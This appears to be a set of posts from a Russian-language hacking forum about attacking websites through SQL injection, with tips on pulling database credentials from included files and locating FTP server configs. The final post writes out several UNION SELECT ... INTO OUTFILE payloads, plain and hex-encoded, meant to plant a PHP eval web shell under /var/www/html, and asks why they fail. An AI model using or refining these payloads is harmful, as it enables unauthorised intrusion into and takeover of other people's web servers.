нет. Можешь администрации посоветовать выключить вывод ошибок. посмотри следующие темы: http://forum.antichat.ru/showthread.php?t=121272 https://forum.antichat.ru/showthread.php?t=30711 http://www.1337day.com/exploits/17158
Буржуйский сайт? Тогда спи спокойно. Котенок Кисс думает... сделав тройное сальто, говорит, что надо сказать о уязвимости админам, тогда они поблагодарят тебя, а ты спасаешь жопу. Уж блиц-то знает, с такой датой регистрации в интернете.
Та мало ли, вдруг ему нужно не целые таблицы а некоторые колонки из них. естественно есть, а как по твоему скрипт выводит инфу из базы? тебе ещо раз говорят, просмотри все файлы что инклудятся в скрипте, там в какомто из них будут данные от БД
Смотри какой фтп серв используется, далее гугли дефолтные конфиги(пути) для него, а хитрожопый админ может засунуть и оч глубоко конфиг.
kise, тащи эти файлы с собой stdio и.т.д этих заголовочных файлов на серве нет, но судя по тому что ошибки лезут компилятор таки есть.
http://ru.wikipedia.org/wiki/Salt#.D0.A3.D1.80.D0.BE.D0.B2.D0.BD.D0.B8_.D0.B7.D0.B0.D1.89.D0.B8.D1.82.D1.8B И реши что именно тебе надо и надо ли вообще.
Столкнулся вот с токой проблеммой,чтобы прочитать файл нужно путь к файлу представить в hex,а теперь сижу и ломаю голову а как же теперь шела залить обычным запросом +union+select+1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'-- не получается пробовал уже и так +union+select+1,2,3,0x3c3f706870206576616c28245f4745545be2809865e280995d29203f3e,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'-- и даже так +union+select+1,2,3,'0x3c3f706870206576616c28245f4745545be2809865e280995d29203f3e',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'-- ничего не выходит.Помогите пожалуйста
